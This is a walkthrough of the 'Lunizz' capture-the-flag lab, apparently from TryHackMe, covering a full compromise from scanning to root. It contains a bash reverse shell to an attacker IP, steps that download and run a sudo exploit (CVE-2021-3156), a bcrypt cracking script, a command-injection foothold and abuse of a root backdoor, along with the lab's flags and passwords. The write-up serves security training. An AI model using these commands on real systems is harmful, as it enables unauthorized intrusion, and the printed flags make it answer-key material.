Lunizz CTF
scan the machine
nmap -A -T4 10.10.80.142
there are 4 open ports (80,3306,4444,5000)
decode the message on port 4444, we have extremesecurerootpassword and p@ssword
try to connect with netcat
nc 10.10.80.142 4444
it seem root, but no...
just a normal webpage
bruteforce the directory
gobuster dir -u http://10.10.80.142/ -w /usr/share/wordlists/dirb/common.txt -t 30 -x php,txt
check the /hidden directory, it like a upload page
and /whatever directory, it like a command injection
but all of above is not working
instructions.txt maybe more interested runcheck:CTF_script_cave_changeme
connect to mysql server
mysql -u runcheck -p -h 10.10.80.142
CTF_script_cave_changeme
if it appear an error, wait a minute until it connect
SHOW DATABASES;
use runornot;
SHOW TABLES;
SELECT * FROM runcheck;
hey, what is run level? what is run on root? doesn't this related to what we just found above
UPDATE runcheck SET run = 1;
comeback /whatever folder, the run level change to 1
create a reverse shell
nc -vlnp 1234
/bin/bash -c "bash -i >& /dev/tcp/10.18.37.45/1234 0>&1"
cool, gain foothold
upgrade shell
python3 -c "import pty;pty.spawn('/bin/bash')"
export SHELL=/bin/bash;export TERM=xterm-256color
Ctrl+Z
stty raw -echo; fg
ls -la /
i found a folder proct is owned by adam maybe interest
we have a subfolder pass and a python file inside
so crack the password of bcrypt
john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash
but it's not work because the password is salted, you must crack by hand
spoil, password is in range middle of rockyou, so it will take you hours of time, create smaller passlist
sed -n '7288400,7288830p' /usr/share/wordlists/rockyou.txt > list.txt
#!/usr/bin/env python3
import bcrypt
import base64
wordlist = []
with open('list.txt','rt') as file:
f = file.readlines()
wordlist = [ x.strip() for x in f ]
salt = b'$2b$12$SVInH5XmuS3C7eQkmqa6UO'
passwd = b'$2b$12$SVInH5XmuS3C7eQkmqa6UOM6sDIuumJPrvuiTr.Lbz3GCcUqdf.z6'
for word in wordlist:
password = word
bpass = password.encode('utf-8')
passed= str(base64.b64encode(bpass))
hashAndSalt = bcrypt.hashpw(passed.encode(), salt)
print('\r', end='') # Clear previous line
print(f'Hash: {hashAndSalt}', end='')
if hashAndSalt == passwd:
print(f'Found: {word}')
break
Spoiler alert: the password is isolsa_tabefX100pre. Where does this occur in rockyou?
import bcrypt
import base64
salt = b'$2b$12$SVInH5XmuS3C7eQkmqa6UO'
passwd = b'$2b$12$SVInH5XmuS3C7eQkmqa6UOM6sDIuumJPrvuiTr.Lbz3GCcUqdf.z6'
password = 'isolsa_tabefX100pre'
bpass = password.encode('ascii')
passed= str(base64.b64encode(bpass))
hashAndSalt = bcrypt.hashpw(passed.encode(), salt)
if hashAndSalt == passwd:
print("Match: ", password)
Ok. Let's say we use our python script and run through rockyou; how long would that take?
Honestly I don't know, but it would be a long time. Many hours. i don't know how it got past testing
but, i found another approach at CVE-2021-3156
git clone https://github.com/blasty/CVE-2021-3156.git
cd CVE-2021-3156
python3 -m http.server
on target machine
cd /tmp
wget http://10.18.37.45:8000/exploit.c
wget http://10.18.37.45:8000/shellcode.c
wget http://10.18.37.45:8000/Makefile
make
./exploit 0
maybe it's not work, a bad experience with a lab...
after login to adam with our cracked password, look at Desktop has a archive folder
cat /home/adam/Desktop/.archive/to_my_best_friend_adam.txt
it's a google map place
so, login to mason with password northernlights (lowercase and remove spaces)
| Flag | user.txt |
|---|---|
| Answer | thm{23cd53cbb37a37a74d4425b703d91883} |
check netstat -a returns a service of root running on http://127.0.0.1:8080
curl http://127.0.0.1:8080/
it seem a mason's backdoor
curl http://127.0.0.1:8080/ -X POST -d "password=northernlights&cmdtype=lsla"
change password
curl http://127.0.0.1:8080/ -X POST -d "password=northernlights&cmdtype=passwd"
su root
northernlights
cat /root/r00t.txt
| Flag | r00t.txt |
|---|---|
| Answer | thm{ad23b9c63602960371b50c7a697265db} |